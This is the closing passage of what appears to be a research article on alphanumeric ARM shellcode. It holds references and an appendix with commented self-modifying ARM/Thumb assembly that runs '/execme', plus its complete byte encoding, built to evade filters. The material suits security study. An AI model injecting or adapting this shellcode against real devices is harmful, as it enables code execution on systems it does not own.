jhind, johnycsh, mercy, mjm, mu-b, nemo, ninja405, pandzilla, pusscat, rizzo, rjohnson, sih, skape, skywing, slow, trew, vf, warlord, wastedimage, west, X, xbud --[ 5. References [0] The ARM Architecture Reference Manual http://www.arm.com/miscPDFs/14128.pdf [1] Writing ia32 alphanumeric shellcodes http://www.phrack.org/issues.html?issue=57&id=18#article [2] Into my ARMs: Developing StrongARM/Linux shellcode http://www.isec.pl/papers/into_my_arms_dsls.pdf --[ A. Shellcode Appendix ----[ A.0 Writable Memory For debugging purposes, it is convenient to execute the shellcode as a normal application, instead of injecting it into a buffer. However, if it's compiled as a normal application, the code will be loaded in non-writable code memory. Since our shellcode is self-modifying, the application will first have to set the memory to writable before executing the code. This can be done with the following code fragment: .ARM # set the text section writable MOV r0, #32768 MOV r1, #4096 MOV r2, #7 BL mprotect Of course, this is not necessary when the shellcode is injected through a buffer overflow. The memory that contains the buffer will always be writable. ----[ A.1 Example Shellcode In this example, the shellcode starts up, switches to thumb mode and executes the application "/execme". Some of the techniques presented here are: getting a known value into a register, modifying our own shellcode, flushing the instruction cache, and switching from ARM to Thumb. # our shellcode starts here # nops SUBPL r3, r1, #56 SUBPL r3, r1, #56 # do not change these instructions # we will use them to load a value # into our register SUBPL r3, r1, #56 SUBPL r3, r1, #56 # continue nops SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 SUBPL r3, r1, #56 # we can't load directly from # PC so we must get PC into r3 # we do this by subtracting 48 # from PC SUBMI r3, pc, #48 SUBPL r3, pc, #48 # load 56 into r3 LDRPLB r3, [r3, #-48] LDRMIB r3, [r3, #-48] # Set r5 to -1 # update the flags: result is negative # so we know we need MI from now on SUBMIS r5, r3, #57 SUBPLS r5, r3, #57 # r7 to stackpointer SUBMI r7, SP, #48 # Set r3 to 0 # set positive flag SUBMIS r3, r3, #56 # set r4 to 0 SUBPL r4, r3, r3, ROR #2 # Set r6 to 0 SUBPL r6, r4, r4, ROR #2 # store registers to stack STMPLFD r7, {r0, r4, r5, r6, r8, lr}^ # r5 to -121 SUBPL r5, r4, #121 # copy PC to r6 SUBPL r6, PC, r5, ROR #2 SUBPL r6, r6, r5, ROR #2 SUBPL r6, r6, r5, ROR #2 SUBPL r6, r6, r5, ROR #2 SUBPL r6, r6, r5, ROR #2 SUBPL r6, r6, r5, ROR #2 SUBPL r6, r6, r5, ROR #2 # write 0 to SWI 0x414141 # becomes: SWI 0x410041 # OFFSET USED HERE # IF CODE CHANGES, CHANGE OFFSET STRPLB r3, [r6, #-100] # put 56 back into r3 # we are positive after this EORPLS r3, r3, #56 SUBPL r7, r3, #57 # write 9F to SWI 0x410041 # becomes SWI 0x9F0041 # we are negative after this EORPLS r5, r7, #80 # negative EORMIS r5, r5, #48 # OFFSET USED HERE # IF CODE CHANGES, CHANGE OFFSET STRMIB r5, [r6, #-99] # write 2 to SWI 0x9F0041 # becomes SWI 0x9F0002 SUBMI r5, r3, #54 STRMIB r5, [r6, #-101] # write 0x16 to 0x41303030 # becomes 0x41303016 # positive EORMIS r5, r3, #66 EORPLS r5, r5, #108 # OFFSET USED HERE # IF CODE CHANGES, CHANGE OFFSET STRPLB r5, [r6, #-89] # write 2F to 0x41303016 # becomes 0x412F3016 EORPLS r5, r3, #86 EORPLS r5, r5, #65 # OFFSET USED HERE # IF CODE CHANGES, CHANGE OFFSET STRPLB r5, [r6, #-87] # write FF to 0x412FFF16 # becomes 0x412FFF16 (BXPL r6) # OFFSET USED HERE # IF CODE CHANGES, CHANGE OFFSET STRPLB r7, [r6, #-88] # r7 = -1 # set r3 to -121 SUBPL r3, r7, #120 # SUBPL r6, r6, r3, ROR #2 # write DF for swi to 0x3030 # becomes 0xDF30 (SWI 48) # becomes negative EORPLS r5, r7, #97 EORMIS r5, r5, #65 # OFFSET USED HERE # IF CODE CHANGES, CHANGE OFFSET STRMIB r5, [r6, #-73] # Set positive flag EORMIS r7, r4, #56 # load arguments for SWI # r0 = 0, r1 = -1, r2 = 0 SUBPL r5, SP, #48 # We use LDMPLFA, because it's one of the few instructions # we can use to write to the registers R0 to R2. # Other instructions generate non-alphanumeric characters LDMPLFA r5!, {r0, r1, r2, r6, r8, lr} # Set r7 to -1 # Negative after this SUBPLS r7, r7, #57 # This will become: # SWIMI 0x9f0002 SWIMI 0x414141 # Set positive flag again EORMIS r5, r4, #56 # set thumb mode SUBPL r6, pc, r7, ROR #2 # this should be BXPL r6 # but in hex that's # 0x51 0x2f 0xff 0x16, so we # overwrite the 0x30 above .byte 0x30,0x30,0x30,0x51 .THUMB .ALIGN 2 # We assume r2 is 0 before # entering Thumb mode # copy pc to r0 mov r0, pc # OFFSET USED HERE # IF CODE CHANGES, CHANGE OFFSET # misalign r0 to address of 1execme2 - 47 # we will write to r0+47 and r0+54 # (beginning of the string) add r0, #100 sub r0, #105 # set r1 to 0 mul r1, r2 # set r1 tp 47 add r1, #97 sub r1, #50 # store r1 ('/') at r0+47 # string becomes /execme2 strb r1, [r0, r1] # set r1 to 0 mul r1, r2 # set r1 to 54 add r1, #54 # store 0 at r0+54 # string becomes /execme\0 strb r2, [r0, r1] # set r1 to 0 mul r1, r2 # set r1 to -1 add r1, #48 sub r1, #49 # set r7 to 1 neg r7, r1 # set r1 to 0 mul r1, r2 # set r1 to 11 (0xb), # the exec system call code add r1, #65 sub r1, #54 # our systemcall code must be in r7 # r7 = 1, r1 contains the code mul r7, r1 # set r1 to 0 (first parameter of execve) mul r1, r2 # set r0 to beginning of the string add r0, #97 sub r0, #50 # This wil become: swi 48 .byte 0x30,0x30 # This is a nop used for # alignment add r7, #50 # our command .ascii "1execme2" # nops used for alignment add r7, #50 add r7, #50 ----[ A.2 Resulting Bytes char shellcode[] = "\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41" "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41" "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41" "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41" "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41" "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41" "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41" "\x52\x30\x30\x4f\x42\x30\x30\x4f\x52\x30\x30\x53\x55\x30\x30\x53" "\x45\x39\x50\x53\x42\x39\x50\x53\x52\x30\x70\x4d\x42\x38\x30\x53" "\x42\x63\x41\x43\x50\x64\x61\x44\x50\x71\x41\x47\x59\x79\x50\x44" "\x52\x65\x61\x4f\x50\x65\x61\x46\x50\x65\x61\x46\x50\x65\x61\x46" "\x50\x65\x61\x46\x50\x65\x61\x46\x50\x65\x61\x46\x50\x64\x30\x46" "\x55\x38\x30\x33\x52\x39\x70\x43\x52\x50\x50\x37\x52\x30\x50\x35" "\x42\x63\x50\x46\x45\x36\x50\x43\x42\x65\x50\x46\x45\x42\x50\x33" "\x42\x6c\x50\x35\x52\x59\x50\x46\x55\x56\x50\x33\x52\x41\x50\x35" "\x52\x57\x50\x46\x55\x58\x70\x46\x55\x78\x30\x47\x52\x63\x61\x46" "\x50\x61\x50\x37\x52\x41\x50\x35\x42\x49\x50\x46\x45\x38\x70\x34" "\x42\x30\x50\x4d\x52\x47\x41\x35\x58\x39\x70\x57\x52\x41\x41\x41" "\x4f\x38\x50\x34\x42\x67\x61\x4f\x50\x30\x30\x30\x51\x78\x46\x64" "\x30\x69\x38\x51\x43\x61\x31\x32\x39\x41\x54\x51\x43\x36\x31\x42" "\x54\x51\x43\x30\x31\x31\x39\x4f\x42\x51\x43\x41\x31\x36\x39\x4f" "\x43\x51\x43\x61\x30\x32\x38\x30\x30\x32\x37\x31\x65\x78\x65\x63" "\x6d\x65\x32\x32\x37\x32\x37"; 80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR 80AR80AR80AR80AR80AR80AR80AR80AR80AR00OB00OR00SU00SE9PSB9PSR0pMB80SBcACP daDPqAGYyPDReaOPeaFPeaFPeaFPeaFPeaFPeaFPd0FU803R9pCRPP7R0P5BcPFE6PCBePFE BP3BlP5RYPFUVP3RAP5RWPFUXpFUx0GRcaFPaP7RAP5BIPFE8p4B0PMRGA5X9pWRAAAO8P4B gaOP000QxFd0i8QCa129ATQC61BTQC0119OBQCA169OCQCa02800271execme22727 --------[ EOF